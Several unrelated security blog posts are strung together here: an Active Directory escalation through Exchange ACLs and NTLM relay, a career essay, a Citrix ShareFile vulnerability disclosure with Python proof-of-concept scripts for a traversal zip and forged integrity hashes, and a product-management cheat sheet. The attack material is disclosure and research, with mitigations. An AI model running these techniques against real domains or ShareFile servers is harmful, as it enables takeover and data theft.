During a recent penetration test, we managed to obtain a user account that was a member of the Organization Management security group. This group is created when Exchange is installed and provided access to Exchange-related activities. Besides access to these Exchange settings, it also allows its members to modify the group membership of other Exchange security groups, such as the Exchange Trusted Subsystem security group. This group is a member of the Exchange Windows Permissions security group.


By default, the Exchange Windows Permissions security group has writeDACL permission on the domain object of the domain where Exchange was installed. 1


The writeDACL permissions allows an identity to modify permissions on the designated object (in other words: modify the ACL) which means that by being a member of the Organization Management group we were able to escalate out privileges to that of a domain administrator.
To exploit this, we added our user account that we obtained earlier to the Exchange Trusted Subsystem group. We logged on again (because security group memberships are only loaded during login) and now we were a member of the Exchange Trusted Subsystem group and the Exchange Windows Permission group, which allowed us to modify the ACL of the domain.

If you have access to modify the ACL of an AD object, you can assign permissions to an identity that allows them to write to a certain attribute, such as the attribute that contains the telephone number. Besides assigning read/write permissions to these kinds of attributes, it is also possible to assign permissions to extended rights. These rights are predefined tasks, such as the right of changing a password, sending email to a mailbox and many more2. It is also possible to add any given account as a replication partner of the domain by applying the following extended rights:

  • Replicating Directory Changes
  • Replicating Directory Changes All

When we set these permissions for our user account, we were able to request the password hash of any user in the domain, including that of the krbtgt account of the domain. More information about this privilege escalation technique can be found on the following GitHub page:

Obtaining a user account that is a member of the Organization Management group is not something that happens quite often. Nonetheless, this technique can be used on a broader basis. It is possible that the Organization Management group is managed by another group. That group may be managed by another group, et cetera. That means that it is possible that there is a chain throughout the domain that is difficult to discover but, if correlated correctly, might lead to full compromise of the domain.

To help exploit this chain of security risks, Fox-IT wrote two tools. The first tool is written in PowerShell and can be run within or outside an AD environment. The second tool is an extension to the ntlmrelayx tool. This extension allows the attacker to relay identities (user accounts and computer accounts) to Active Directory and modify the ACL of the domain object.


Invoke-ACLPwn is a Powershell script that is designed to run with integrated credentials as well as with specified credentials. The tool works by creating an export with SharpHound3 of all ACLs in the domain as well as the group membership of the user account that the tool is running under. If the user does not already have writeDACL permissions on the domain object, the tool will enumerate all ACEs of the ACL of the domain. Every identity in an ACE has an ACL of its own, which is added to the enumeration queue. If the identity is a group and the group has members, every group member is added to the enumeration queue as well. As you can imagine, this takes some time to enumerate but could end up with a chain to obtain writeDACL permission on the domain object.


When the chain has been calculated, the script will then start to exploit every step in the chain:

  • The user is added to the necessary groups
  • Two ACEs are added to the ACL of the domain object:
    • Replicating Directory Changes
    • Replicating Directory Changes All
  • Optionally, Mimkatz’ DCSync feature is invoked and the hash of the given user account is requested. By default the krbtgt account will be used.

After the exploitation is done, the script will remove the group memberships that were added during exploitation as well as the ACEs in the ACL of the domain object.

To test the script, we created 26 security groups. Every group was member of another group (testgroup_a was a member of testgroup_b, which itself was a member of testgroup_c, et cetera, up until testgroup_z.)
The security group testgroup_z had the permission to modify the membership of the Organization Management security group. As written earlier, this group had the permission to modify the group membership of the Exchange Trusted Subsystem security group. Being a member of this group will give you the permission to modify the ACL of the domain object in Active Directory.

We now had a chain of 31 links:

  • Indirect member of 26 security groups
  • Permission to modify the group membership of the Organization Management security group
  • Membership of the Organization Management
  • Permission to modify the group membership of the Exchange Trusted Subsystem security group
  • Membership of the Exchange Trusted Subsystem and the Exchange Windows Permission security groups

The result of the tool can be seen in the following screenshot:


Please note that in this example we used the ACL configuration that was configured
during the installation of Exchange. However, the tool does not rely on Exchange
or any other product to find and exploit a chain.

Currently, only the writeDACL permission on the domain object is enumerated
and exploited. There are other types of access rights such as owner, writeOwner, genericAll, et cetera, that can be exploited on other object as well.
These access rights are explained in depth in this whitepaper by the BloodHound team.
Updates to the tool that also exploit these privileges will be developed and released in the future.
The Invoke-ACLPwn tool can be downloaded from our GitHub here:


Last year we wrote about new additions to ntlmrelayx allowing relaying to LDAP, which allows for domain enumeration and escalation to Domain Admin by adding a new user to the Directory. Previously, the LDAP attack in ntlmrelayx would check if the relayed account was a member of the Domain Admins or Enterprise Admins group, and escalate privileges if this was the case. It did this by adding a new user to the Domain and adding this user to the Domain Admins group.
While this works, this does not take into account any special privileges that a relayed user might have. With the research presented in this post, we introduce a new attack method in ntlmrelayx. This attack involves first requesting the ACLs of important Domain objects, which are then parsed from their binary format into structures the tool can understand, after which the permissions of the relayed account are enumerated.
This takes into account all the groups the relayed account is a member of (including recursive group memberships). Once the privileges are enumerated, ntlmrelayx will check if the user has high enough privileges to allow for a privilege escalation of either a new or an existing user.
For this privilege escalation there are two different attacks. The first attack is called the ACL attack in which the ACL on the Domain object is modified and a user under the attackers control is granted Replication-Get-Changes-All privileges on the domain, which allows for using DCSync as desribed in the previous sections. If modifying the domain ACL is not possible, the access to add members to several high privilege groups in the domain is considered for a Group attack:

  • Enterprise Admins
  • Domain Admins
  • Backup Operators (who can back up critical files on the Domain Controller)
  • Account Operators (who have control over almost all groups in the domain)

If an existing user was specified using the --escalate-user flag, this user will be given the Replication privileges if an ACL attack can be performed, and added to a high-privilege group if a Group attack is used. If no existing user is specified, the options to create new users are considered. This can either be in the Users container (the default place for user accounts), or in an OrganizationalUnit for which control was delegated to for example IT department members.

One may have noticed that we mentioned relayed accounts here instead of relayed users. This is because the attack also works against computer accounts that have high privileges. An example for such an account is the computer account of an Exchange server, which is a member of the Exchange Windows Permissions group in the default configuration. If an attacker is in a position to convince the Exchange server to authenticate to the attacker’s machine, for example by using mitm6 for a network level attack, privileges can be instantly escalated to Domain Admin.

Relaying Exchange account

The NTDS.dit hashes can now be dumped by using impacket’s or with Mimikatz:


Similarly if an attacker has Administrative privileges on the Exchange Server, it is possible to escalate privilege in the domain without the need to dump any passwords or machine account hashes from the system.
Connecting to the attacker from the NT Authority\SYSTEM perspective and authenticating with NTLM is sufficient to authenticate to LDAP. The screenshot below shows the PowerShell function Invoke-Webrequest being called with, which will run from a SYSTEM perspective. The flag -UseDefaultCredentials will enable automatic authentication with NTLM.


The 404 error here is expected as serves a 404 page if the relaying attack is complete

It should be noted that relaying attacks against LDAP are possible in the default configuration of Active Directory, since LDAP signing, which partially mitigates this attack, is disabled by default. Even if LDAP signing is enabled, it is still possible to relay to LDAPS (LDAP over SSL/TLS) since LDAPS is considered a signed channel. The only mitigation for this is enabling channel binding for LDAP in the registry.
To get the new features in ntlmrelayx, simply update to the latest version of impacket from GitHub:


As for mitigation, Fox-IT has a few recommendations.

Remove dangerous ACLs
Check for dangerous ACLs with tools such as Bloodhound. 3
Bloodhound can make an export of all ACLs in the domain which helps identifying
dangerous ACLs.

Remove writeDACL permission for the Exchange Windows Permissions group
Remove the writeDACL permission for the Exchange Windows Permissions group. The following GitHub page contains a PowerShell script which can assist with this:

Monitor security groups
Monitor (the membership of) security groups that can have a high impact on the domain, such as the Exchange Trusted Subsystem and the Exchange Windows Permissions.

Audit and monitor changes to the ACL.
Audit changes to the ACL of the domain. If not done already, it may be necessary to modify the domain controller policy. More information about this can be found on the following TechNet article:

When the ACL of the domain object is modified, an event will be created with event ID 5136. The Windows event log can be queried with PowerShell, so here is a one-liner to get all events from the Security event log with ID 5136:

Get-WinEvent -FilterHashtable @{logname='security'; id=5136}

This event contains the account name and the ACL in a Security Descriptor Definition Language (SDDL) format.


Since this is unreadable for humans, there is a PowerShell cmdlet in Windows 10,
ConvertFrom-SDDL4, which converts the SDDL string into a more readable ACL object.


If the server runs Windows Server 2016 as operating system, it is also possible to see the original and modified descriptors. For more information:

With this information you should be able to start an investigation to discover what was modified, when that happened and the reason behind that.



Security Product Management at Large Companies vs. Startups

Is it better to perform product management of information security solutions at a large company or at a startup? Picking the setting that’s right for you isn’t as simple as craving the exuberant energy of a young firm or coveting the resources and brand of an organization that’s been around for a while. Each environment has its challenges and advantages for product managers. The type of innovation, nature of collaboration, sales dynamics, and cultural nuances are among the factors to consider when deciding which setting is best for you.

The perspective below is based on my product management experiences in the field information security, though I suspect it’s applicable to product managers in other hi-tech environments.

Product Management at a Large Firm

In the world of information security, industry incumbents are usually large organizations. This is in part because growing in a way that satisfies investors generally requires the financial might, brand and customer access that’s hard for small cyber-security companies to achieve. Moreover, customers who are not early adopters often find it easier to focus their purchasing on a single provider of unified infosec solutions. These dynamics set the context for the product manager’s role at large firms.

Access to Customers

Though the specifics differs across organizations, product management often involves defining capabilities and driving adoption. The product manager’s most significant advantage at a large company is probably access to customers. This is due to the size of the firm’s sales and marketing organization, as well as due to the large number of companies that have already purchased some of the company’s products.

Such access helps with understanding requirements for new products, improving existing technologies, and finding new customers. For example, you could bring your product to a new geography by using the sales force present in that area without having to hire a dedicated team. Also, it’s easier to upsell a complementary solution than build a new customer relationship from scratch.

Access to Expertise

Another benefit of a large organization is access to funds and expertise that’s sometimes hard to obtain in a young, small company. Instead of hiring a full-time specialist for a particular task, you might be able to draw upon the skills and experience of someone who supports multiple products and teams. In addition, assuming your efforts receive the necessary funding, you might find it easier to pursue product objectives and enter new markets in a way that could be hard for a startup to accomplish. This isn’t always easy, because budgetary planning in large companies can be more onerous than Venture Capitalist fund raising.

Organizational Structure

Working in any capacity at an established firm requires that you understand and follow the often-changing bureaucratic processes inherent to any large entity. Depending on the organization’s structure, product managers in such environments might lack the direct control over the teams vital to the success of their product. Therefore, the product manager needs to excel at forming cross-functional relationships and influencing indirectly. (Coincidentally, this is also a key skill-set for many Chief Information Security Officers.)

Sometimes even understanding all of your own objectives and success criteria in such environments can be challenging. It can be even harder to stay abreast of the responsibilities of others in the corporate structure. On the other hand, one of the upsides of a large organization is the room to grow one’s responsibilities vertically and horizontally without switching organizations. This is often impractical in small companies.

What It’s Like at a Large Firm

In a nutshell, these are the characteristics inherent to product management roles at large companies:

  • An established sales organization, which provides access to customers
  • Potentially-conflicting priorities and incentives with groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially-easier access to funding for sophisticated projects and complex products
  • Possibly-easier access to the needed expertise
  • Well-defined career development roadmap

I loved working as a security product manager at a large company. I was able to oversee a range of in-house software products and managed services that focused on data security. One of my solutions involved custom-developed hardware, with integrated home-grown and third-party software, serviced a team of help desk and in-the-field technicians. A fun challenge!

I also appreciated the chance to develop expertise in the industries that my employer serviced, so I could position infosec benefits in the context relevant to those customers. I enjoyed staying abreast of the social dynamics and politics of a siloed, matrixed organization. After awhile I decided to leave because I was starting to feel a bit too comfortable. I also developed an appetite for risk and began craving the energy inherent to startups.

Product Management in a Startup

One of the most liberating, yet scary aspects of product management at a startup is that you’re starting the product from a clean slate. On the other hand, while product managers at established companies often need to account for legacy requirements and internal dependencies, a young firm is generally free of such entanglements, at least at the onset of its journey.

What markets are we targeting? How will we reach customers? What comprises the minimum viable product? Though product managers ask such questions in all types of companies, startups are less likely to survive erroneous answers in the long term. Fortunately, short-term experiments are easier to perform to validate ideas before making strategic commitments.

Experimenting With Capabilities

Working in a small, nimble company allows the product manager to quickly experiment with ideas, get them implemented, introduce them into the field, and gather feedback. In the world of infosec, rapidly iterating through defensive capabilities of the product is useful for multiple reasons, including the ability to assess—based on real-world feedback—whether the approach works against threats.

Have an idea that is so crazy, it just might work? In a startup, you’re more likely to have a chance to try some aspect of your approach, so you can rapidly determine whether it’s worth pursuing further. Moreover, given the mindshare that the industry’s incumbents have with customers, fast iterations help understand which product capabilities, delivered by the startup, the customers will truly value.

Fluid Responsibilities

In all companies, almost every individual has a certain role for which they’ve been hired. Yet, the specific responsibilities assigned to that role in a young firm often benefit from the person’s interpretation, and are based on the person’s strengths and the company’s need at a given moment. A security product manager working at a startup might need to assist with pre-sales activities, take a part in marketing projects, perform threat research and potentially develop proof-of-concept code, depending on what expertise the person possesses and what the company requires.

People in a small company are less likely to have the “it’s not my job attitude” than those in highly-structured, large organizations. A startup generally has fewer silos, making it easier to engage in activities that interest the person even if they are outside his or her direct responsibilities. This can be stressful and draining at times. On the other hand, it makes it difficult to get bored, and also gives the product manager an opportunity to acquire skills in areas tangential to product management. (For additional details regarding this, see my article What’s It Like to Join a Startup’s Executive Team?)

Customer Reach

Product manager’s access to customers and prospects at a startup tends to be more immediate and direct than at a large corporation. This is in part because of the many hats that the product manager needs to wear, sometimes acting as a sales engineer and at times helping with support duties. These tasks give the person the opportunity to hear unfiltered feedback from current and potential users of the product.

However, a young company simply lacks the scale of the sales force that accommodates reaching many customers until the firm builds up steam. (See Access to Customers above.) This means that the product manager might need to help identifying prospects, which can be outside the comfort zone of individuals who haven’t participated in sales efforts in this capacity.

What It’s Like at a Startup

Here are the key aspects of performing product management at a startup:

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

I’m presently responsible for product management at Minerva Labs, a young endpoint security company. I’m loving the make-or-break feeling of the startup. For the first time, I’m overseeing the direction of a core product that’s built in-house, rather than managing a solution built upon third-party technology. It’s gratifying to be involved in the creation of new technology in such a direct way.

There are lots of challenges, of course, but every day feels like an adventure, as we fight for the seat at the big kids table, grow the customer base and break new ground with innovative anti-malware approaches. It’s a risky environment with high highs and low lows, but it feels like the right place for me right now.

Which Setting is Best for You?

Numerous differences between startups and large companies affect the experience of working in these firms. The distinction is highly pronounced for product managers, who oversee the creation of the solutions sold by these companies. You need to understand these differences prior to deciding which of the environments is best for you, but that’s just a start. Next, understand what is best for you, given where you are in life and your professional development. Sometimes the capabilities that you as a product manager will have in an established firm will be just right; at others, you will thrive in a startup. Work in the environment that appeals to you, but also know when (or whether) it’s time to make a change.

Compromising Citrix ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities, which together allowed any account to (from the internet) access any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several fortune-500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the Cloud or with an on-premise component).


Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the filetransfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly we see a h= parameter, followed by a base64 encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following python code creates a special zip file called, which contains two files, one of which has a relative path.

import sys, zipfile
#the name of the zip file to generate
zf = zipfile.ZipFile('', 'w')
#the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'xxe_oob.xml'
#destination path of the file
zf.write(fname, '../../../../testbestand_fox.tmp')
#random extra file (not required)
#example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but that we were able to successfully change the directory to which the file was extracted. This vulnerability can be used to write user controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path would be c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\ we can add a file with the name ../storage/subdirectory/filename.txt which will then be written to the target directory. The ../ part indicates that the Operating System should go one directory higher in the directory tree and use the rest of the path from that location.

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistenstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name already indicates this is the ID assigned to the upload, in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there are folders for each upload matching with this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:


In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name, the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32 character long uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond with the file ID for the upload and folder ID to which the file is uploaded respectively.

After trying to figure out for a while what kind of hashing algorithm was used for the integrity check of this file, it turned out that it is a simple md5 hash of the rest of the data in the info.txt file. The twist here is that the data is encoded with UTF-16-LE, which is default for Unicode strings in Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and write this back to disk:

import md5
with open('info_modified.txt','r') as infile:
instr ='|')
instr2 = u'|'.join(instr[:-1])
outhash ='utf-16-le')).hexdigest().upper()
with open('info_out.txt','w') as outfile:
outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the info.txt file is not verified for integrity using a secret only known by the application, but is only validated with an md5 hash against corruption. This gives an attacker that can write to the storage folders the possibility to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as temporary name for the file. The data that is uploaded is written to this file, and when the upload is finilized this file is added to the users ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename to attempt to extract a test file called secret.txt which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the filesize of the secret.txt file we are trying to extract is 14 bytes instead of 13 as the modified info.txt indicated. We can upload a new info.txt file which does have the correct filesize, and the secret.txt file is succesfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we do know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the frequested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter which contains the download token. Additionally there is a h parameter which contains a HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<!--?xml version="1.0" encoding="utf-8"?--><!--?xml version="1.0" encoding="utf-8"?--><?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Item key="operatingsystem" value="Linux" />
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
<ShareID />

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f which is the ShareFile AccountID, which is unique per ShareFile instance. Then the second ID fi0f0f2e_3477_4647_9cdd_e89758c21c37 is unique for the file (hence the fi prefix), with two 0f subdirectories for the first characters of the ID (presumably to prevent huge folder listings).

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a program written in .NET and running under IIS, it is trivial to decompile the binaries with toos such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Token XML files integrity integrity not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not nessecary to calculate the signature as an attacker, since the application simply tells you what correct signature is if it doesn’t match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is calculated by prepending the secret to the data and calculating a sha1 hash over this. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation taking place of this path, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains a HMAC, which makes modifying this parameter seemingly impossible:


However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request, which is then used to verify all parameters in the url before the h parameter. Thus any parameters following the h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:


We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values which are separated with a comma. Only the first uploadid parameter is verified by the HMAC, since it operates on the query string instead of the individual parameter values, and only verifies the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Polution.

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attackers account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.


By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Token XML files integrity integrity not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick with following up on the issues and rolling out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown if they were using the hybrid setup in a vulnerable configuration. Therefor, the number of affected installations and if these issues were abused is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned

Practical Tips for Creating and Managing New Information Technology Products

This cheat sheet offers advice for product managers of new IT solutions at startups and enterprises. To print it, use the one-page PDF version; you can also edit the Word version to customize it for you own needs.

Responsibilities of a Product Manager

  • Determine what to build, not how to build it.
  • Envision the future pertaining to product domain.
  • Align product roadmap to business strategy.
  • Define specifications for solution capabilities.
  • Prioritize feature requirements, defect correction, technical debt work and other development efforts.
  • Help drive product adoption by communicating with customers, partners, peers and internal colleagues.
  • Participate in the handling of issue escalations.
  • Sometimes take on revenue or P&L responsibilities.

Defining Product Capabilities

  • Understand gaps in the existing products within the domain and how customers address them today.
  • Understand your firm’s strengths and weaknesses.
  • Research the strengths and weaknesses of your current and potential competitors.
  • Define the smallest set of requirements for the initial (or next) release (minimum viable product).
  • When defining product requirements, balance long-term strategic needs with short-term tactical ones.
  • Understand your solutions key benefits and unique value proposition.

Strategic Market Segmentation

  • Market segmentation often accounts for geography, customer size or industry verticals.
  • Devise a way of grouping customers based on the similarities and differences of their needs.
  • Also account for the similarities in your capabilities, such as channel reach or support abilities.
  • Determine which market segments you’re targeting.
  • Understand similarities and differences between the segments in terms of needs and business dynamics.
  • Consider how you’ll reach prospective customers in each market segment.

Engagement with the Sales Team

  • Understand the nature and size of the sales force aligned with your product.
  • Explore the applicability and nature of a reseller channel or OEM partnerships for product growth.
  • Understand sales incentives pertaining to your product and, if applicable, attempt to adjust them.
  • Look for misalignments, such as recurring SaaS product pricing vs. traditional quarterly sales goals.
  • Assess what other products are “competing” for the sales team’s attention, if applicable.
  • Determine the nature of support you can offer the sales team to train or otherwise support their efforts.
  • Gather sales’ negative and positive feedback regarding the product.
  • Understand which market segments and use-cases have gained the most traction in the product’s sales.

The Pricing Model

  • Understand the value that customers in various segments place on your product.
  • Determine your initial costs (software, hardware, personnel, etc.) related to deploying the product.
  • Compute your ongoing costs related to maintaining the product and supporting its users.
  • Decide whether you will charge customers recurring or one-time (plus maintenance) fees for the product.
  • Understand the nature of customers’ budgets, including any CapEx vs. OpEx preferences.
  • Define the approach to offering volume pricing discounts, if applicable.
  • Define the model for compensating the sales team, including resellers, if applicable.
  • Establish the pricing schedule, setting the priced based on perceived value.
  • Account for the minimum desired profit margin.

Product Delivery and Operations

  • Understand the intricacies of deploying the solution.
  • Determine the effort required to operate, maintain and support the product on an ongoing basis.
  • Determine for the technical steps, personnel, tools, support requirements and the associated costs.
  • Document the expectations and channels of communication between you and the customer.
  • Establish the necessary vendor relationship for product delivery, if necessary.
  • Clarify which party in the relationship has which responsibilities for monitoring, upgrades, etc.
  • Allocate the necessary support, R&D, QA, security and other staff to maintain and evolve the product.
  • Obtain the appropriate audits and certifications.

Product Management at Startups

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

Product Management at Large Firms

  • An established sales organization, which provides access to customers
  • Potentially-conflicting priorities and incentives with groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially-easier access to funding for sophisticated projects and complex products
  • Possibly-easier access to the needed expertise
  • Well-defined career development roadmap


Authored by Lenny Zeltser, who’ve been responsible for product management of information security solutions at companies large and small. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

mitm6 – compromising IPv4 networks via IPv6

